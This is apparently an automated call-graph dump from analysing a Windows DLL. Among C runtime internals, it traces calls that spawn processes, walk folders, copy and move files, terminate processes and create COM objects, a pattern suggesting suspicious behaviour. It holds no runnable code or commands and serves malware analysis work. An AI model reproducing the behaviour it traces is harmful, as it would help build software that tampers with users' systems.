___scrt_uninitialize_crt 79 API calls 13611->13613 13625 6f9f00d8 13612->13625 13616 6f9f0163 13613->13616 13617 6f9e609e __wsopen_s 50 API calls 13616->13617 13619 6f9f01a0 13617->13619 13619->13601 13620 6f9f0189 13638 6f9f5de5 13620->13638 13673 6f9eafe1 LeaveCriticalSection 13622->13673 13624 6f9eff6d 13624->13594 13626 6f9f0118 13625->13626 13627 6f9f00f1 13625->13627 13626->13616 13631 6f9ed222 13626->13631 13627->13626 13628 6f9ed222 __fread_nolock 50 API calls 13627->13628 13629 6f9f010d 13628->13629 13649 6f9f113f 13629->13649 13632 6f9ed22e 13631->13632 13633 6f9ed243 13631->13633 13634 6f9ee7b1 __dosmaperr 17 API calls 13632->13634 13633->13620 13635 6f9ed233 13634->13635 13636 6f9ec276 __wsopen_s 50 API calls 13635->13636 13637 6f9ed23e 13636->13637 13637->13620 13639 6f9f5df6 13638->13639 13642 6f9f5e03 13638->13642 13640 6f9ee7b1 __dosmaperr 17 API calls 13639->13640 13648 6f9f5dfb 13640->13648 13641 6f9f5e4c 13643 6f9ee7b1 __dosmaperr 17 API calls 13641->13643 13642->13641 13644 6f9f5e2a 13642->13644 13645 6f9f5e51 13643->13645 13660 6f9f5d43 13644->13660 13647 6f9ec276 __wsopen_s 50 API calls 13645->13647 13647->13648 13648->13616 13650 6f9f114b ___scrt_is_nonwritable_in_current_image 13649->13650 13651 6f9f118c 13650->13651 13653 6f9f11d2 13650->13653 13659 6f9f1153 13650->13659 13652 6f9ec1f9 __wsopen_s 33 API calls 13651->13652 13652->13659 13654 6f9f33e2 __wsopen_s EnterCriticalSection 13653->13654 13655 6f9f11d8 13654->13655 13656 6f9f11f6 13655->13656 13657 6f9f1250 __wsopen_s 73 API calls 13655->13657 13658 6f9f1248 __wsopen_s LeaveCriticalSection 13656->13658 13657->13656 13658->13659 13659->13626 13661 6f9f5d4f ___scrt_is_nonwritable_in_current_image 13660->13661 13662 6f9f33e2 __wsopen_s EnterCriticalSection 13661->13662 13663 6f9f5d5e 13662->13663 13664 6f9f365e __wsopen_s 50 API calls 13663->13664 13672 6f9f5da3 13663->13672 13666 6f9f5d8a FlushFileBuffers 13664->13666 13665 6f9ee7b1 __dosmaperr 17 API calls 13667 6f9f5daa 13665->13667 13666->13667 13668 6f9f5d96 GetLastError 13666->13668 13670 6f9f5dd9 ___scrt_uninitialize_crt LeaveCriticalSection 13667->13670 13669 6f9ee79e __dosmaperr 17 API calls 13668->13669 13669->13672 13671 6f9f5dc2 13670->13671 13671->13648 13672->13665 13673->13624 13674->13607 13680 6f9ed073 13675->13680 13678 6f9e4bb8 ___vcrt_uninitialize_ptd 7 API calls 13679 6f9e30ba 13678->13679 13679->12875 13683 6f9edae8 13680->13683 13684 6f9e359c 13683->13684 13685 6f9edaf2 13683->13685 13684->13678 13687 6f9efc71 13685->13687 13688 6f9efb4e __dosmaperr 5 API calls 13687->13688 13689 6f9efc8d 13688->13689 13690 6f9efca8 TlsFree 13689->13690 13691 6f9efc96 mydllmain 13689->13691 13692 6f9efca3 13691->13692 13692->13684 13694 6f9e2983 __fread_nolock 13693->13694 13727 6f9e10ab 13694->13727 13696 6f9e299b __DllMainCRTStartup@12 _strlen 13730 6f9e1024 13696->13730 13699 6f9eb928 ___vcrt_freefls@4 17 API calls 13700 6f9e29e4 GetEnvironmentVariableW 13699->13700 13734 6f9e1274 13700->13734 13703 6f9e10ab __DllMainCRTStartup@12 59 API calls 13704 6f9e2a14 __DllMainCRTStartup@12 _strlen 13703->13704 13705 6f9e1024 __DllMainCRTStartup@12 58 API calls 13704->13705 13706 6f9e2a54 13705->13706 13707 6f9eb928 ___vcrt_freefls@4 17 API calls 13706->13707 13708 6f9e2a5a 13707->13708 13754 6f9e140f 13708->13754 13711 6f9e10ab __DllMainCRTStartup@12 59 API calls 13712 6f9e2a92 __DllMainCRTStartup@12 _strlen 13711->13712 13713 6f9e1024 __DllMainCRTStartup@12 58 API calls 13712->13713 13714 6f9e2adc 13713->13714 13715 6f9eb928 ___vcrt_freefls@4 17 API calls 13714->13715 13716 6f9e2ae2 13715->13716 13717 6f9e10ab __DllMainCRTStartup@12 59 API calls 13716->13717 13718 6f9e2af5 __DllMainCRTStartup@12 _strlen 13717->13718 13719 6f9e1024 __DllMainCRTStartup@12 58 API calls 13718->13719 13720 6f9e2b3d 13719->13720 13721 6f9eb928 ___vcrt_freefls@4 17 API calls 13720->13721 13722 6f9e2b43 13721->13722 13776 6f9e1629 13722->13776 13726 6f9e1012 ExitProcess 13815 6f9e107d 13727->13815 13731 6f9e103d __DllMainCRTStartup@12 13730->13731 13938 6f9eaabc 13731->13938 14119 6f9e44d0 13734->14119 13736 6f9e12a3 GetModuleHandleW 13737 6f9e10ab __DllMainCRTStartup@12 59 API calls 13736->13737 13738 6f9e12c6 __DllMainCRTStartup@12 _strlen 13737->13738 13739 6f9e1308 GetProcAddress 13738->13739 13740 6f9eb928 ___vcrt_freefls@4 17 API calls 13739->13740 13741 6f9e1320 13740->13741 13742 6f9e10ab __DllMainCRTStartup@12 59 API calls 13741->13742 13743 6f9e1332 __DllMainCRTStartup@12 _strlen 13742->13743 13744 6f9e1374 GetProcAddress 13743->13744 13745 6f9eb928 ___vcrt_freefls@4 17 API calls 13744->13745 13746 6f9e138b 13745->13746 13747 6f9e10ab __DllMainCRTStartup@12 59 API calls 13746->13747 13748 6f9e139d __DllMainCRTStartup@12 _strlen 13747->13748 13749 6f9e13dd GetProcAddress 13748->13749 13750 6f9eb928 ___vcrt_freefls@4 17 API calls 13749->13750 13751 6f9e13f4 13750->13751 13752 6f9e2e45 _ValidateLocalCookies 5 API calls 13751->13752 13753 6f9e1407 13752->13753 13753->13703 13755 6f9e1439 __fread_nolock 13754->13755 13756 6f9e10ab __DllMainCRTStartup@12 59 API calls 13755->13756 13757 6f9e1485 __DllMainCRTStartup@12 _strlen 13756->13757 13758 6f9e1024 __DllMainCRTStartup@12 58 API calls 13757->13758 13759 6f9e14cd 13758->13759 13760 6f9eb928 ___vcrt_freefls@4 17 API calls 13759->13760 13761 6f9e14d6 13760->13761 13762 6f9e1024 __DllMainCRTStartup@12 58 API calls 13761->13762 13763 6f9e14f7 CreateProcessW 13762->13763 13764 6f9e160e 13763->13764 13767 6f9e1525 __fread_nolock 13763->13767 13765 6f9e2e45 _ValidateLocalCookies 5 API calls 13764->13765 13766 6f9e1622 Sleep Sleep 13765->13766 13766->13711 13768 6f9e10ab __DllMainCRTStartup@12 59 API calls 13767->13768 13769 6f9e156b __DllMainCRTStartup@12 _strlen 13768->13769 13770 6f9e1024 __DllMainCRTStartup@12 58 API calls 13769->13770 13771 6f9e15b3 13770->13771 13772 6f9eb928 ___vcrt_freefls@4 17 API calls 13771->13772 13773 6f9e15b9 13772->13773 13774 6f9e1024 __DllMainCRTStartup@12 58 API calls 13773->13774 13775 6f9e15e3 Sleep CreateProcessW 13774->13775 13775->13764 13777 6f9e1024 __DllMainCRTStartup@12 58 API calls 13776->13777 13778 6f9e16ca FindFirstFileW 13777->13778 13786 6f9e16f2 13778->13786 13779 6f9e1a0d 14121 6f9e2469 13779->14121 13782 6f9e19e8 FindNextFileW 13782->13786 13783 6f9e1024 __DllMainCRTStartup@12 58 API calls 13783->13786 13784 6f9e2469 __DllMainCRTStartup@12 50 API calls 13785 6f9e1a23 13784->13785 13787 6f9e2e45 _ValidateLocalCookies 5 API calls 13785->13787 13786->13779 13786->13782 13786->13783 13788 6f9e1629 __DllMainCRTStartup@12 126 API calls 13786->13788 13795 6f9e1794 __DllMainCRTStartup@12 _strlen 13786->13795 13789 6f9e1a40 13787->13789 13788->13786 13808 6f9e2e45 13789->13808 13790 6f9e1024 __DllMainCRTStartup@12 58 API calls 13792 6f9e19af TerminateProcess CloseHandle CloseHandle 13790->13792 13791 6f9e10ab __DllMainCRTStartup@12 59 API calls 13791->13795 14208 6f9e1a48 13792->14208 13794 6f9e1024 __DllMainCRTStartup@12 58 API calls 13794->13795 13795->13790 13795->13791 13795->13794 13796 6f9eb928 ___vcrt_freefls@4 17 API calls 13795->13796 13797 6f9e17f2 ExpandEnvironmentStringsW 13796->13797 13798 6f9e1024 __DllMainCRTStartup@12 58 API calls 13797->13798 13802 6f9e1828 __fread_nolock __DllMainCRTStartup@12 13798->13802 13799 6f9e2469 50 API calls __DllMainCRTStartup@12 13799->13802 13800 6f9e23bb 52 API calls __DllMainCRTStartup@12 13800->13802 13802->13799 13802->13800 13804 6f9e1024 __DllMainCRTStartup@12 58 API calls 13802->13804 14125 6f9e23ec 13802->14125 14133 6f9e1cfa CoInitialize CoCreateInstance 13802->14133 13805 6f9e190a CopyFileW Sleep 13804->13805 14203 6f9eb8fb MoveFileExW 13805->14203 13807 6f9e1940 TerminateProcess CloseHandle CloseHandle 13807->13786 13809 6f9e2e4e IsProcessorFeaturePresent 13808->13809 13810 6f9e2e4d 13808->13810 13812 6f9e3289 13809->13812 13810->13726 14949 6f9e324c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13812->14949 13814 6f9e336c 13814->13726 13816 6f9e1094 __DllMainCRTStartup@12 13815->13816 13819 6f9eaa7b 13816->13819 13820 6f9eaa8f __wsopen_s 13819->13820 13825 6f9e6891 13820->13825 13823 6f9e609e __wsopen_s 50 API calls 13824 6f9e109e 13823->13824 13824->13696 13826 6f9e689d 13825->13826 13827 6f9e68c0 13825->13827 13828 6f9ec1f9 __wsopen_s 33 API calls 13826->13828 13831 6f9e68e7 13827->13831 13833 6f9e659a 13827->13833 13832 6f9e68b8 13828->13832 13830 6f9ec1f9 __wsopen_s 33 API calls 13830->13832 13831->13830 13831->13832 13832->13823 13834 6f9e65e9 13833->13834 13835 6f9e65c6 13833->13835 13834->13835 13839 6f9e65f1 __DllMainCRTStartup@12 13834->13839 13836 6f9ec1f9 __wsopen_s 33 API calls 13835->13836 13837 6f9e65de 13836->13837 13838 6f9e2e45 _ValidateLocalCookies 5 API calls 13837->13838 13840 6f9e670c 13838->13840 13844 6f9e8a6b 13839->13844 13840->13831 13861 6f9ea71e 13844->13861 13846 6f9e6672 13858 6f9e847f 13846->13858 13847 6f9ec1f9 __wsopen_s 33 API calls 13847->13846 13848 6f9e8a90 13848->13847 13853 6f9e8a85 __DllMainCRTStartup@12 13853->13846 13853->13848 13854 6f9e8b94 13853->13854 13865 6f9ea670 13853->13865 13872 6f9e86c9 13853->13872 13875 6f9e90e8 13853->13875 13909 6f9e970d 13853->13909 13855 6f9ec1f9 __wsopen_s 33 API calls 13854->13855 13856 6f9e8bae 13855->13856 13857 6f9ec1f9 __wsopen_s 33 API calls 13856->13857 13857->13846 13859 6f9ee7c4 ___free_lconv_mon 17 API calls 13858->13859 13860 6f9e848f 13859->13860 13860->13837 13862 6f9ea742 13861->13862 13863 6f9ea729 13861->13863 13862->13853 13864 6f9ec1f9 __wsopen_s 33 API calls 13863->13864 13864->13862 13866 6f9e64e7 __wsopen_s 50 API calls 13865->13866 13867 6f9ea680 13866->13867 13868 6f9ee879 __wsopen_s 50 API calls 13867->13868 13869 6f9ea69d 13868->13869 13870 6f9ee8d7 __wsopen_s 50 API calls 13869->13870 13871 6f9ea6aa 13870->13871 13871->13853 13873 6f9e6bcc __DllMainCRTStartup@12 50 API calls 13872->13873 13874 6f9e8704 13873->13874 13874->13853 13876 6f9e90ef 13875->13876 13877 6f9e9106 13875->13877 13879 6f9e9792 13876->13879 13880 6f9e9732 13876->13880 13902 6f9e9145 13876->13902 13878 6f9ec1f9 __wsopen_s 33 API calls 13877->13878 13877->13902 13883 6f9e913a 13878->13883 13881 6f9e97cb 13879->13881 13882 6f9e9797 13879->13882 13884 6f9e97b8 13880->13884 13885 6f9e9738 13880->13885 13886 6f9e97e8 13881->13886 13887 6f9e97d0 13881->13887 13888 6f9e97c4 13882->13888 13892 6f9e9799 13882->13892 13883->13853 13894 6f9e76eb __DllMainCRTStartup@12 34 API calls 13884->13894 13893 6f9e973d 13885->13893 13896 6f9e9789 13885->13896 13890 6f9ea4ae __DllMainCRTStartup@12 34 API calls 13886->13890 13887->13884 13887->13896 13907 6f9e9763 __DllMainCRTStartup@12 13887->13907 13889 6f9ea474 __DllMainCRTStartup@12 34 API calls 13888->13889 13889->13907 13890->13907 13891 6f9e974c 13895 6f9e9f7a __DllMainCRTStartup@12 57 API calls 13891->13895 13908 6f9e97f1 __DllMainCRTStartup@12 13891->13908 13892->13891 13899 6f9e97a8 13892->13899 13893->13891 13897 6f9e9776 13893->13897 13893->13907 13894->13907 13895->13907 13898 6f9e7a0a __DllMainCRTStartup@12 34 API calls 13896->13898 13896->13908 13900 6f9ea2b2 __DllMainCRTStartup@12 52 API calls 13897->13900 13897->13908 13898->13907 13899->13884 13901 6f9e97ac 13899->13901 13900->13907 13904 6f9ea3ef __DllMainCRTStartup@12 33 API calls 13901->13904 13901->13908 13902->13853 13903 6f9e2e45 _ValidateLocalCookies 5 API calls 13905 6f9e9a6a 13903->13905 13904->13907 13905->13853 13906 6f9ef461 __DllMainCRTStartup@12 52 API calls 13906->13907 13907->13906 13907->13908 13908->13903 13910 6f9e9792 13909->13910 13911 6f9e9732 13909->13911 13912 6f9e97cb 13910->13912 13913 6f9e9797 13910->13913 13914 6f9e97b8 13911->13914 13915 6f9e9738 13911->13915 13916 6f9e97e8 13912->13916 13917 6f9e97d0 13912->13917 13918 6f9e9799 13913->13918 13919 6f9e97c4 13913->13919 13923 6f9e76eb __DllMainCRTStartup@12 34 API calls 13914->13923 13925 6f9e9789 13915->13925 13926 6f9e973d 13915->13926 13922 6f9ea4ae __DllMainCRTStartup@12 34 API calls 13916->13922 13917->13914 13917->13925 13936 6f9e9763 __DllMainCRTStartup@12 13917->13936 13921 6f9e974c 13918->13921 13927 6f9e97a8 13918->13927 13920 6f9ea474 __DllMainCRTStartup@12 34 API calls 13919->13920 13920->13936 13924 6f9e9f7a __DllMainCRTStartup@12 57 API calls 13921->13924 13937 6f9e97f1 __DllMainCRTStartup@12 13921->13937 13922->13936 13923->13936 13924->13936 13929 6f9e7a0a __DllMainCRTStartup@12 34 API calls 13925->13929 13925->13937 13926->13921 13928 6f9e9776 13926->13928 13926->13936 13927->13914 13930 6f9e97ac 13927->13930 13931 6f9ea2b2 __DllMainCRTStartup@12 52 API calls 13928->13931 13928->13937 13929->13936 13933 6f9ea3ef __DllMainCRTStartup@12 33 API calls 13930->13933 13930->13937 13931->13936 13932 6f9e2e45 _ValidateLocalCookies 5 API calls 13934 6f9e9a6a 13932->13934 13933->13936 13934->13853 13935 6f9ef461 __DllMainCRTStartup@12 52 API calls 13935->13936 13936->13935 13936->13937 13937->13932 13939 6f9eaad0 __wsopen_s 13938->13939 13944 6f9e6930 13939->13944 13942 6f9e609e __wsopen_s 50 API calls 13943 6f9e1047 13942->13943 13943->13699 13945 6f9e695f 13944->13945 13946 6f9e693c 13944->13946 13947 6f9e6986 13945->13947 13952 6f9e670e 13945->13952 13948 6f9ec1f9 __wsopen_s 33 API calls 13946->13948 13950 6f9ec1f9 __wsopen_s 33 API calls 13947->13950 13951 6f9e6957 13947->13951 13948->13951 13950->13951 13951->13942 13953 6f9e675d 13952->13953 13954 6f9e673a 13952->13954 13953->13954 13957 6f9e6765 __DllMainCRTStartup@12 13953->13957 13955 6f9ec1f9 __wsopen_s 33 API calls 13954->13955 13961 6f9e6752 13955->13961 13956 6f9e2e45 _ValidateLocalCookies 5 API calls 13958 6f9e688f 13956->13958 13963 6f9e8d4f 13957->13963 13958->13947 13960 6f9e847f __DllMainCRTStartup@12 17 API calls 13960->13961 13961->13956 13964 6f9ea71e __DllMainCRTStartup@12 33 API calls 13963->13964 13967 6f9e8d64 __DllMainCRTStartup@12 13964->13967 13965 6f9e67e6 13965->13960 13966 6f9e8d6f 13968 6f9ec1f9 __wsopen_s 33 API calls 13966->13968 13967->13965 13967->13966 13972 6f9e8741 13967->13972 13975 6f9e9241 13967->13975 14016 6f9e9a6c 13967->14016 13968->13965 14052 6f9e6ddb 13972->14052 13974 6f9e877e 13974->13967 13976 6f9e924f 13975->13976 13977 6f9e9267 13975->13977 13979 6f9e92a8 13976->13979 13980 6f9e9a9a 13976->13980 13981 6f9e9b04 13976->13981 13978 6f9ec1f9 __wsopen_s 33 API calls 13977->13978 13977->13979 13984 6f9e929c 13978->13984 13979->13967 13985 6f9e9b2c 13980->13985 13986 6f9e9aa0 13980->13986 13982 6f9e9b09 13981->13982 13983 6f9e9b43 13981->13983 13987 6f9e9b3a 13982->13987 13988 6f9e9b0b 13982->13988 13989 6f9e9b48 13983->13989 13990 6f9e9b62 13983->13990 13984->13967 14089 6f9e7878 13985->14089 13991 6f9e9aa5 13986->13991 13992 6f9e9ad1 13986->13992 14096 6f9ea491 13987->14096 13998 6f9e9ab3 13988->13998 14005 6f9e9b1a 13988->14005 13995 6f9e9b4d 13989->13995 13996 6f9e9b59 13989->13996 14104 6f9ea4c4 13990->14104 13991->13996 13999 6f9e9aab 13991->13999 13992->13999 14001 6f9e9af9 13992->14001 13995->13985 13995->14001 14100 6f9ea54c 13996->14100 14014 6f9e9b6d __DllMainCRTStartup@12 13998->14014 14062 6f9ea10b 13998->14062 13999->13998 14003 6f9e9ade 13999->14003 14011 6f9e9acc __DllMainCRTStartup@12 13999->14011 14001->14014 14078 6f9e7b97 14001->14078 14003->14014 14072 6f9ea347 14003->14072 14005->13985 14007 6f9e9b1e 14005->14007 14007->14014 14085 6f9ea3ef 14007->14085 14008 6f9e2e45 _ValidateLocalCookies 5 API calls 14009 6f9e9e5e 14008->14009 14009->13967 14012 6f9ea670 __wsopen_s 50 API calls 14011->14012 14011->14014 14015 6f9e9d4d 14011->14015 14012->14015 14014->14008 14015->14014 14107 6f9ef5cb 14015->14107 14017 6f9e9a9a 14016->14017 14018 6f9e9b04 14016->14018 14021 6f9e9b2c 14017->14021 14022 6f9e9aa0 14017->14022 14019 6f9e9b09 14018->14019 14020 6f9e9b43 14018->14020 14023 6f9e9b3a 14019->14023 14024 6f9e9b0b 14019->14024 14025 6f9e9b48 14020->14025 14026 6f9e9b62 14020->14026 14029 6f9e7878 __DllMainCRTStartup@12 34 API calls 14021->14029 14027 6f9e9aa5 14022->14027 14028 6f9e9ad1 14022->14028 14030 6f9ea491 __DllMainCRTStartup@12 34 API calls 14023->14030 14031 6f9e9ab3 14024->14031 14041 6f9e9b1a 14024->14041 14032 6f9e9b4d 14025->14032 14033 6f9e9b59 14025->14033 14034 6f9ea4c4 __DllMainCRTStartup@12 34 API calls 14026->14034 14027->14033 14035 6f9e9aab 14027->14035 14028->14035 14037 6f9e9af9 14028->14037 14047 6f9e9acc __DllMainCRTStartup@12 14029->14047 14030->14047 14036 6f9ea10b __DllMainCRTStartup@12 57 API calls 14031->14036 14050 6f9e9b6d __DllMainCRTStartup@12 14031->14050 14032->14021 14032->14037 14038 6f9ea54c __DllMainCRTStartup@12 50 API calls 14033->14038 14034->14047 14035->14031 14039 6f9e9ade 14035->14039 14035->14047 14036->14047 14040 6f9e7b97 __DllMainCRTStartup@12 34 API calls 14037->14040 14037->14050 14038->14047 14043 6f9ea347 __DllMainCRTStartup@12 51 API calls 14039->14043 14039->14050 14040->14047 14041->14021 14042 6f9e9b1e 14041->14042 14046 6f9ea3ef __DllMainCRTStartup@12 33 API calls 14042->14046 14042->14050 14043->14047 14044 6f9e2e45 _ValidateLocalCookies 5 API calls 14045 6f9e9e5e 14044->14045 14045->13967 14046->14047 14048 6f9ea670 __wsopen_s 50 API calls 14047->14048 14047->14050 14051 6f9e9d4d 14047->14051 14048->14051 14049 6f9ef5cb __wsopen_s 51 API calls 14049->14051 14050->14044 14051->14049 14051->14050 14053 6f9ea6cb __DllMainCRTStartup@12 50 API calls 14052->14053 14055 6f9e6df1 14053->14055 14054 6f9e6e06 14056 6f9ec1f9 __wsopen_s 33 API calls 14054->14056 14055->14054 14059 6f9e6e39 14055->14059 14061 6f9e6e21 __DllMainCRTStartup@12 14055->14061 14056->14061 14057 6f9e7138 14058 6f9ea63e __DllMainCRTStartup@12 50 API calls 14057->14058 14058->14061 14059->14057 14060 6f9ea63e __DllMainCRTStartup@12 50 API calls 14059->14060 14060->14057 14061->13974 14063 6f9ea12c 14062->14063 14064 6f9e69fb __DllMainCRTStartup@12 18 API calls 14063->14064 14065 6f9ea16e __DllMainCRTStartup@12 14064->14065 14066 6f9ef2e0 __DllMainCRTStartup@12 56 API calls 14065->14066 14067 6f9ea201 14066->14067 14068 6f9ea670 __wsopen_s 50 API calls 14067->14068 14069 6f9ea224 __DllMainCRTStartup@12 14067->14069 14068->14069 14070 6f9ea670 __wsopen_s 50 API calls 14069->14070 14071 6f9ea260 __DllMainCRTStartup@12 14069->14071 14070->14071 14071->14011 14071->14071 14073 6f9ea374 __DllMainCRTStartup@12 14072->14073 14074 6f9ea390 14073->14074 14075 6f9ea670 __wsopen_s 50 API calls 14073->14075 14076 6f9ea3b1 14073->14076 14077 6f9ef5cb __wsopen_s 51 API calls 14074->14077 14075->14074 14076->14011 14077->14076 14079 6f9e7bac __DllMainCRTStartup@12 14078->14079 14080 6f9e7bce 14079->14080 14082 6f9e7bf5 14079->14082 14081 6f9ec1f9 __wsopen_s 33 API calls 14080->14081 14084 6f9e7beb __DllMainCRTStartup@12 14081->14084 14083 6f9e6a7c __DllMainCRTStartup@12 18 API calls 14082->14083 14082->14084 14083->14084 14084->14011 14088 6f9ea405 __DllMainCRTStartup@12 14085->14088 14086 6f9ec1f9 __wsopen_s 33 API calls 14087 6f9ea426 14086->14087 14087->14011 14088->14086 14088->14087 14090 6f9e788d __DllMainCRTStartup@12 14089->14090 14091 6f9e78af 14090->14091 14093 6f9e78d6 14090->14093 14092 6f9ec1f9 __wsopen_s 33 API calls 14091->14092 14095 6f9e78cc __DllMainCRTStartup@12 14092->14095 14094 6f9e6a7c __DllMainCRTStartup@12 18 API calls 14093->14094 14093->14095 14094->14095 14095->14011 14097 6f9ea49d 14096->14097 14098 6f9e7559 __DllMainCRTStartup@12 34 API calls 14097->14098 14099 6f9ea4ad 14098->14099 14099->14011 14101 6f9ea569 __DllMainCRTStartup@12 14100->14101 14102 6f9ea5c0 __DllMainCRTStartup@12 50 API calls 14101->14102 14103 6f9ea587 __DllMainCRTStartup@12 14101->14103 14102->14103 14103->14011 14105 6f9e7b97 __DllMainCRTStartup@12 34 API calls 14104->14105 14106 6f9ea4d9 14105->14106 14106->14011 14108 6f9ef5df 14107->14108 14116 6f9ef5ef 14107->14116 14109 6f9ef614 14108->14109 14110 6f9ea670 __wsopen_s 50 API calls 14108->14110 14108->14116 14111 6f9ef648 14109->14111 14112 6f9ef625 14109->14112 14110->14109 14114 6f9ef6c4 14111->14114 14115 6f9ef670 14111->14115 14111->14116 14113 6f9f5b7c __wsopen_s 5 API calls 14112->14113 14113->14116 14117 6f9f2c0b __fread_nolock MultiByteToWideChar 14114->14117 14115->14116 14118 6f9f2c0b __fread_nolock MultiByteToWideChar 14115->14118 14116->14015 14117->14116 14118->14116 14120 6f9e44e7 14119->14120 14120->13736 14120->14120 14122 6f9e1a18 14121->14122 14123 6f9e2472 14121->14123 14122->13784 14240 6f9e2529 14123->14240 14126 6f9e2411 14125->14126 14127 6f9e2463 14126->14127 14130 6f9e241e __DllMainCRTStartup@12 14126->14130 14271 6f9e119f 14127->14271 14132 6f9e2425 __fread_nolock 14130->14132 14250 6f9e2711 14130->14250 14132->13802 14134 6f9e1d7b 14133->14134 14135 6f9e1d63 14133->14135 14137 6f9e23ec __DllMainCRTStartup@12 52 API calls 14134->14137 14327 6f9e1053 14135->14327 14139 6f9e1d8a ExpandEnvironmentStringsW 14137->14139 14141 6f9e1dbe __DllMainCRTStartup@12 14139->14141 14140 6f9e2329 14142 6f9e2469 __DllMainCRTStartup@12 50 API calls 14140->14142 14331 6f9e248f 14141->14331 14143 6f9e2334 14142->14143 14145 6f9e2469 __DllMainCRTStartup@12 50 API calls 14143->14145 14147 6f9e233f 14145->14147 14146 6f9e1dcc VariantInit VariantInit VariantInit VariantInit 14148 6f9e1e4f VariantClear VariantClear VariantClear VariantClear 14146->14148 14149 6f9e2469 __DllMainCRTStartup@12 50 API calls 14147->14149 14150 6f9e1e8c 14148->14150 14151 6f9e1e77 14148->14151 14152 6f9e234a 14149->14152 14341 6f9e11aa 14150->14341 14155 6f9e1053 __DllMainCRTStartup@12 85 API calls 14151->14155 14154 6f9e2e45 _ValidateLocalCookies 5 API calls 14152->14154 14156 6f9e2367 14154->14156 14169 6f9e1e82 CoUninitialize 14155->14169 14156->13802 14158 6f9e1e9e 14350 6f9e1216 14158->14350 14160 6f9e2469 __DllMainCRTStartup@12 50 API calls 14160->14140 14161 6f9e1ecc 14161->14151 14162 6f9e1ed8 14161->14162 14163 6f9e1f0d 14162->14163 14164 6f9e1ef8 14162->14164 14166 6f9e1f21 14163->14166 14167 6f9e11aa __DllMainCRTStartup@12 54 API calls 14163->14167 14165 6f9e1053 __DllMainCRTStartup@12 85 API calls 14164->14165 14165->14169 14168 6f9e1053 __DllMainCRTStartup@12 85 API calls 14166->14168 14170 6f9e1f39 14167->14170 14168->14169 14202 6f9e2303 14169->14202 14171 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14170->14171 14172 6f9e1f61 14171->14172 14172->14166 14173 6f9e11aa __DllMainCRTStartup@12 54 API calls 14172->14173 14174 6f9e2057 14173->14174 14175 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14174->14175 14176 6f9e207f 14175->14176 14177 6f9e208e 14176->14177 14178 6f9e1053 __DllMainCRTStartup@12 85 API calls 14176->14178 14179 6f9e11aa __DllMainCRTStartup@12 54 API calls 14177->14179 14178->14177 14180 6f9e20ad 14179->14180 14181 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14180->14181 14182 6f9e20d5 14181->14182 14182->14166 14183 6f9e11aa __DllMainCRTStartup@12 54 API calls 14182->14183 14184 6f9e2179 14183->14184 14185 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14184->14185 14186 6f9e219f 14185->14186 14187 6f9e11aa __DllMainCRTStartup@12 54 API calls 14186->14187 14188 6f9e21bc 14187->14188 14189 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14188->14189 14190 6f9e21e4 14189->14190 14190->14166 14191 6f9e21fc SysAllocString 14190->14191 14192 6f9e236f 14191->14192 14193 6f9e221c VariantInit VariantInit 14191->14193 14354 6f9e2c70 mydllmain 14192->14354 14195 6f9e11aa __DllMainCRTStartup@12 54 API calls 14193->14195 14197 6f9e225f 14195->14197 14198 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14197->14198 14199 6f9e22b2 VariantClear VariantClear VariantClear 14198->14199 14199->14166 14202->14160 14204 6f9eb924 14203->14204 14205 6f9eb912 GetLastError 14203->14205 14204->13807 14418 6f9ee757 14205->14418 14426 6f9eb0ab 14208->14426 14213 6f9e2e45 _ValidateLocalCookies 5 API calls 14215 6f9e1cf6 14213->14215 14215->13782 14219 6f9eb0ab __DllMainCRTStartup@12 54 API calls 14220 6f9e1ac7 ___std_exception_copy 14219->14220 14454 6f9ebf16 14220->14454 14222 6f9e1aea __DllMainCRTStartup@12 14457 6f9eae5d 14222->14457 14226 6f9e1b33 14226->14213 14241 6f9e254d __DllMainCRTStartup@12 14240->14241 14242 6f9e253d 14240->14242 14241->14122 14242->14241 14245 6f9ec286 14242->14245 14246 6f9ec1c2 __wsopen_s 50 API calls 14245->14246 14247 6f9ec295 14246->14247 14248 6f9ec2a3 __wsopen_s 11 API calls 14247->14248 14249 6f9ec2a2 14248->14249 14251 6f9e271f 14250->14251 14252 6f9e275a 14250->14252 14253 6f9e2728 14251->14253 14254 6f9e2747 14251->14254 14287 6f9e1152 14252->14287 14253->14252 14257 6f9e272f 14253->14257 14258 6f9e273c 14254->14258 14261 6f9e2e58 __DllMainCRTStartup@12 52 API calls 14254->14261 14256 6f9e2735 14256->14258 14259 6f9ec286 __DllMainCRTStartup@12 50 API calls 14256->14259 14274 6f9e2e58 14257->14274 14258->14132 14262 6f9e2764 14259->14262 14261->14258 14263 6f9e277d __DllMainCRTStartup@12 14262->14263 14264 6f9e27e3 14262->14264 14267 6f9e2711 __DllMainCRTStartup@12 52 API calls 14263->14267 14265 6f9e119f __DllMainCRTStartup@12 52 API calls 14264->14265 14266 6f9e27e8 14265->14266 14268 6f9e279e __DllMainCRTStartup@12 14267->14268 14269 6f9e2529 __DllMainCRTStartup@12 50 API calls 14268->14269 14270 6f9e27cc __DllMainCRTStartup@12 14268->14270 14269->14270 14270->14132 14316 6f9e2c4d 14271->14316 14275 6f9e2e5d ___std_exception_copy 14274->14275 14276 6f9e2e77 14275->14276 14277 6f9ec30c __dosmaperr 3 API calls 14275->14277 14278 6f9e2e79 14275->14278 14276->14256 14277->14275 14279 6f9e1152 Concurrency::cancel_current_task 14278->14279 14280 6f9e2e83 __DllMainCRTStartup@12 14278->14280 14293 6f9e47d6 14279->14293 14283 6f9e47d6 _com_raise_error 2 API calls 14280->14283 14282 6f9e116e 14298 6f9e10c8 14282->14298 14285 6f9e338f 14283->14285 14288 6f9e1160 Concurrency::cancel_current_task 14287->14288 14289 6f9e47d6 _com_raise_error 2 API calls 14288->14289 14290 6f9e116e 14289->14290 14291 6f9e10c8 Concurrency::cancel_current_task 50 API calls 14290->14291 14292 6f9e117b 14291->14292 14292->14256 14294 6f9e481d RaiseException 14293->14294 14295 6f9e47f0 14293->14295 14294->14282 14296 6f9e47f5 mydllmain 14295->14296 14297 6f9e480e 14295->14297 14296->14297 14297->14294 14301 6f9e3ece 14298->14301 14302 6f9e3edb ___std_exception_copy 14301->14302 14306 6f9e10e9 14301->14306 14303 6f9e3f08 14302->14303 14302->14306 14307 6f9ed105 